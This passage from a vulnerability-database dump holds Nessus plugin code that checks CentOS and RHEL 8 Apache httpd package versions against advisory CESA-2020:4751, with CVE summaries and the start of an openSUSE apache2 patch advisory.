'pkgs': [\n {'reference':'httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module+el8.3.0+7670+8bf57d29', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_session-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'sp':'6', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/aarch64/appstream/debug',\n 'content/dist/rhel8/8/aarch64/appstream/os',\n 'content/dist/rhel8/8/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/baseos/debug',\n 'content/dist/rhel8/8/aarch64/baseos/os',\n 'content/dist/rhel8/8/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/codeready-builder/debug',\n 'content/dist/rhel8/8/aarch64/codeready-builder/os',\n 'content/dist/rhel8/8/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/highavailability/debug',\n 'content/dist/rhel8/8/aarch64/highavailability/os',\n 'content/dist/rhel8/8/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/supplementary/debug',\n 'content/dist/rhel8/8/aarch64/supplementary/os',\n 'content/dist/rhel8/8/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/appstream/debug',\n 'content/dist/rhel8/8/ppc64le/appstream/os',\n 'content/dist/rhel8/8/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/baseos/debug',\n 'content/dist/rhel8/8/ppc64le/baseos/os',\n 'content/dist/rhel8/8/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/debug',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/os',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/highavailability/debug',\n 'content/dist/rhel8/8/ppc64le/highavailability/os',\n 'content/dist/rhel8/8/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/debug',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/os',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/debug',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/os',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap/debug',\n 'content/dist/rhel8/8/ppc64le/sap/os',\n 'content/dist/rhel8/8/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/supplementary/debug',\n 'content/dist/rhel8/8/ppc64le/supplementary/os',\n 'content/dist/rhel8/8/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/s390x/appstream/debug',\n 'content/dist/rhel8/8/s390x/appstream/os',\n 'content/dist/rhel8/8/s390x/appstream/source/SRPMS',\n 'content/dist/rhel8/8/s390x/baseos/debug',\n 'content/dist/rhel8/8/s390x/baseos/os',\n 'content/dist/rhel8/8/s390x/baseos/source/SRPMS',\n 'content/dist/rhel8/8/s390x/codeready-builder/debug',\n 'content/dist/rhel8/8/s390x/codeready-builder/os',\n 'content/dist/rhel8/8/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/s390x/highavailability/debug',\n 'content/dist/rhel8/8/s390x/highavailability/os',\n 'content/dist/rhel8/8/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/s390x/resilientstorage/debug',\n 'content/dist/rhel8/8/s390x/resilientstorage/os',\n 'content/dist/rhel8/8/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/s390x/sap/debug',\n 'content/dist/rhel8/8/s390x/sap/os',\n 'content/dist/rhel8/8/s390x/sap/source/SRPMS',\n 'content/dist/rhel8/8/s390x/supplementary/debug',\n 'content/dist/rhel8/8/s390x/supplementary/os',\n 'content/dist/rhel8/8/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module+el8.3.0+7670+8bf57d29', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_session-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.37-30.module+el8.3.0+7001+0766b9e7', 'release':'8', 'el_string':'el8.3.0', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'}\n ]\n }\n ]\n};\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:appstreams, appstreams:TRUE);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/httpd');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\nif ('2.4' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module httpd:' + module_ver);\n\nvar flag = 0;\nvar appstreams_found = 0;\nforeach var module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach var module_array ( appstreams[module] ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(module_array['repo_relative_urls'])) repo_relative_urls = module_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var package_array ( module_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp']) && !enterprise_linux_flag) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'httpd / httpd-devel / httpd-filesystem / httpd-manual / httpd-tools / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T15:32:49", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2020:4751 advisory.\n\n - httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n - httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n - httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n - httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-02-01T00:00:00", "type": "nessus", "title": "CentOS 8 : httpd:2.4 (CESA-2020:4751)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2023-02-08T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-filesystem", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:mod_http2", "p-cpe:/a:centos:centos:mod_ldap", "p-cpe:/a:centos:centos:mod_md", "p-cpe:/a:centos:centos:mod_proxy_html", "p-cpe:/a:centos:centos:mod_session", "p-cpe:/a:centos:centos:mod_ssl"], "id": "CENTOS8_RHSA-2020-4751.NASL", "href": "https://www.tenable.com/plugins/nessus/145821", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4751. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145821);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/08\");\n\n script_cve_id(\n \"CVE-2018-17189\",\n \"CVE-2019-0196\",\n \"CVE-2019-0197\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2020-1927\",\n \"CVE-2020-1934\"\n );\n script_bugtraq_id(106685, 107665, 107669);\n script_xref(name:\"RHSA\", value:\"2020:4751\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0203\");\n\n script_name(english:\"CentOS 8 : httpd:2.4 (CESA-2020:4751)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4751 advisory.\n\n - httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n - httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n - httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n - httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4751\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_http2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/httpd');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\nif ('2.4' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module httpd:' + module_ver);\n\nvar appstreams = {\n 'httpd:2.4': [\n {'reference':'httpd-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module_el8.3.0+477+498bb568', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_http2-1.15.7-2.module_el8.3.0+477+498bb568', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.0.8-8.module_el8.3.0+452+00a0bbdd', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_md-2.0.8-8.module_el8.3.0+452+00a0bbdd', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_proxy_html-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_session-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'mod_ssl-2.4.37-30.module_el8.3.0+561+97fdbbcc', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module httpd:2.4');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'httpd / httpd-devel / httpd-filesystem / httpd-manual / httpd-tools / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2022-11-05T17:32:47", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for apache2 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9517: Fixed HTTP/2 implementations that are vulnerable to\n unconstrained interal data buffering (bsc#1145575).\n - CVE-2019-10081: Fixed mod_http2 that is vulnerable to memory corruption\n on early pushes (bsc#1145742).\n - CVE-2019-10082: Fixed mod_http2 that is vulnerable to read-after-free in\n h2 connection shutdown (bsc#1145741).\n - CVE-2019-10092: Fixed limited cross-site scripting in mod_proxy\n (bsc#1145740).\n - CVE-2019-10097: Fixed mod_remoteip stack buffer overflow and NULL\n pointer dereference (bsc#1145739).\n - CVE-2019-10098: Fixed mod_rewrite configuration vulnerablility to open\n redirect (bsc#1145738).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2051=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2051=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-09-02T00:00:00", "type": "suse", "title": "Security update for apache2 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-09-02T00:00:00", "id": "OPENSUSE-SU-2019:2051-1", "href": 